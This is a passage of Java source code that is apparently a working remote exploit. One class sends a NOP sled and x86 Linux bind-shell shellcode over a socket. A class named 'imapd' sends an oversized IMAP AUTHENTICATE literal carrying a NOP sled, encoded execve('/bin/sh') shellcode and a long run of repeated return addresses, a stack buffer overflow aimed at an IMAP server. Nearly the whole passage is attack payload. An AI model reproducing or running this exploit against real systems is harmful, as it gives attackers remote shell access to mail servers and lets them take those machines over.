char[] codez18 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez18);
char[] codez19 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez19);
char[] codez20 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez20);
char[] codez21 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez21);
char[] codez22 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez22);
char[] codez23 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez23);
char[] codez24 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez24);
char[] codez25 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez25);
char[] codez26 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez26);
char[] codez27 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez27);
char[] codez28 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez28);
char[] codez29 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez29);
char[] codez30 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez30);
char[] codez31 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez31);
char[] codez32 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez32);
char[] codez33 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez33);
char[] codez34 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez34);
char[] codez35 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez35);
char[] codez36 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez36);
char[] codez37 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez37);
char[] codez38 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez38);
char[] codez39 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez39);
char[] codez40 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez40);
char[] codez41 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez41);
char[] codez42 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez42);
char[] codez43 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez43);
char[] codez44 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez44);
char[] codez45 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez45);
char[] codez46 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez46);
char[] codez47 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez47);
char[] codez48 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez48);
char[] codez49 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez49);
char[] codez50 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez50);
char[] codez51 = { 0x90, 0x90, 0x90, 0x33, 0xdb, 0x33, 0xc0, 0xb0, 0x1b, 0xcd, 0x80, 0xeb, 0x59, 0x5e, 0x31, 0xc0 };
sockout.print(codez51);
char[] codez52 = { 0x89, 0x46, 0x18, 0x89, 0x46, 0x20, 0x89, 0x46, 0x24, 0x89, 0x46, 0x28, 0x40, 0x89, 0x46, 0x14 };
sockout.print(codez52);
char[] codez53 = { 0x40, 0x89, 0x46, 0x10, 0x66, 0x89, 0x46, 0x1c, 0x66, 0xc7, 0x46, 0x1e, 0x11, 0x11, 0x31, 0xd2 };
sockout.print(codez53);
char[] codez54 = { 0x31, 0xc0, 0x89, 0xd3, 0xb0, 0x06, 0xcd, 0x80, 0xfe, 0xc2, 0x75, 0xf4, 0x8d, 0x4e, 0x10, 0x31 };
sockout.print(codez54);
char[] codez55 = { 0xc0, 0x89, 0xc3, 0xb3, 0x01, 0xb0, 0x66, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0x46, 0x10, 0x8d, 0x4e };
sockout.print(codez55);
char[] codez56 = { 0x1c, 0x89, 0x4e, 0x14, 0xb0, 0x10, 0x89, 0x46, 0x18, 0x8d, 0x4e, 0x10, 0xb0, 0x02, 0x89, 0xc3 };
sockout.print(codez56);
char[] codez57 = { 0xb0, 0x66, 0xcd, 0x80, 0xeb, 0x02, 0xeb, 0x37, 0x31, 0xc0, 0x89, 0x46, 0x14, 0xb0, 0x05, 0x89 };
sockout.print(codez57);
char[] codez58 = { 0x46, 0x18, 0x8d, 0x4e, 0x14, 0x48, 0x89, 0xc3, 0xb0, 0x66, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0x46 };
sockout.print(codez58);
char[] codez59 = { 0x10, 0x8d, 0x4e, 0x2c, 0x89, 0x4e, 0x14, 0xb0, 0x10, 0x89, 0x46, 0x3c, 0x8d, 0x4e, 0x3c, 0x89 };
sockout.print(codez59);
char[] codez60 = { 0x4e, 0x18, 0x8d, 0x4e, 0x10, 0xb0, 0x05, 0x89, 0xc3, 0xb0, 0x66, 0xcd, 0x80, 0xeb, 0x02, 0xeb };
sockout.print(codez60);
char[] codez61 = { 0x31, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xc9, 0xfe, 0xc3, 0xb0, 0x3f, 0xcd, 0x80, 0xb0, 0x3f, 0x80 };
sockout.print(codez61);
char[] codez62 = { 0xc1, 0x02, 0xcd, 0x80, 0x89, 0x76, 0x08, 0x31, 0xc0, 0x88, 0x46, 0x07, 0x89, 0x46, 0x0c, 0xb0 };
sockout.print(codez62);
char[] codez63 = { 0x0b, 0x89, 0xf3, 0x8d, 0x4e, 0x08, 0x8d, 0x56, 0x0c, 0xcd, 0x80, 0x31, 0xdb, 0x89, 0xd8, 0x40 };
sockout.print(codez63);
char[] codez64 = { 0xcd, 0x80, 0xe8, 0x36, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x90 };
sockout.print(codez64);
}
catch(Exception e)
{
System.out.println(e.toString());
}

}
}
class imapd
{
public imapd()
{
InputStreamReader inread;
BufferedReader buffread;
Socket sock;
InputStreamReader sockin;
String shit = null;
PrintStream sockout;
BufferedReader sockread;
try
{
sock = new Socket("127.0.0.1", 143);
sockin = new InputStreamReader(sock.getInputStream());
sockread = new BufferedReader(sockin);
shit = sockread.readLine();
System.out.println(shit);
sockout = new PrintStream(sock.getOutputStream());
char[] codez1 = { 0x2a, 0x20, 0x41, 0x55, 0x54, 0x48, 0x45, 0x4e, 0x54, 0x49, 0x43, 0x41, 0x54, 0x45, 0x20, 0x7b };
sockout.print(codez1);
char[] codez2 = { 0x32, 0x30, 0x34, 0x38, 0x7d, 0x0d, 0x0a, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez2);
char[] codez3 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez3);
char[] codez4 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez4);
char[] codez5 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez5);
char[] codez6 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez6);
char[] codez7 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez7);
char[] codez8 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez8);
char[] codez9 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez9);
char[] codez10 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez10);
char[] codez11 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez11);
char[] codez12 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez12);
char[] codez13 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez13);
char[] codez14 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez14);
char[] codez15 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez15);
char[] codez16 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez16);
char[] codez17 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez17);
char[] codez18 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez18);
char[] codez19 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez19);
char[] codez20 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez20);
char[] codez21 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez21);
char[] codez22 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez22);
char[] codez23 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez23);
char[] codez24 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez24);
char[] codez25 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez25);
char[] codez26 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez26);
char[] codez27 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez27);
char[] codez28 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xeb, 0x33, 0x5e };
sockout.print(codez28);
char[] codez29 = { 0x89, 0x76, 0x08, 0x31, 0xc0, 0x88, 0x46, 0x07, 0x89, 0x46, 0x0c, 0x80, 0x46, 0x01, 0x80, 0x80 };
sockout.print(codez29);
char[] codez30 = { 0x46, 0x02, 0x80, 0x80, 0x46, 0x03, 0x80, 0x80, 0x46, 0x05, 0x80, 0x80, 0x46, 0x06, 0x80, 0xb0 };
sockout.print(codez30);
char[] codez31 = { 0x0b, 0x89, 0xf3, 0x8d, 0x4e, 0x08, 0x8d, 0x56, 0x0c, 0xcd, 0x80, 0x31, 0xdb, 0x89, 0xd8, 0x40 };
sockout.print(codez31);
char[] codez32 = { 0xcd, 0x80, 0xe8, 0xc8, 0xff, 0xff, 0xff, 0x2f, 0xe2, 0xe9, 0xee, 0x2f, 0xf3, 0xe8, 0x2e, 0x2e };
sockout.print(codez32);
char[] codez33 = { 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez33);
char[] codez34 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez34);
char[] codez35 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez35);
char[] codez36 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez36);
char[] codez37 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez37);
char[] codez38 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez38);
char[] codez39 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez39);
char[] codez40 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez40);
char[] codez41 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez41);
char[] codez42 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez42);
char[] codez43 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez43);
char[] codez44 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez44);
char[] codez45 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez45);
char[] codez46 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez46);
char[] codez47 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez47);
char[] codez48 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez48);
char[] codez49 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez49);
char[] codez50 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez50);
char[] codez51 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez51);
char[] codez52 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez52);
char[] codez53 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez53);
char[] codez54 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez54);
char[] codez55 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez55);
char[] codez56 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez56);
char[] codez57 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez57);
char[] codez58 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez58);
char[] codez59 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez59);
char[] codez60 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez60);
char[] codez61 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez61);
char[] codez62 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez62);
char[] codez63 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez63);
char[] codez64 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez64);
char[] codez65 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez65);
char[] codez66 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez66);
char[] codez67 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez67);
char[] codez68 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez68);
char[] codez69 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez69);
char[] codez70 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez70);
char[] codez71 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez71);
char[] codez72 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez72);
char[] codez73 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez73);
char[] codez74 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez74);
char[] codez75 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez75);
char[] codez76 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez76);
char[] codez77 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez77);
char[] codez78 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez78);
char[] codez79 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez79);
char[] codez80 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez80);
char[] codez81 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez81);
char[] codez82 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez82);
char[] codez83 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez83);
char[] codez84 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez84);
char[] codez85 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez85);
char[] codez86 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez86);
char[] codez87 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez87);
char[] codez88 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez88);
char[] codez89 = { 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0, 0xf0, 0xff, 0xbf, 0xb0 };
sockout.print(codez89);
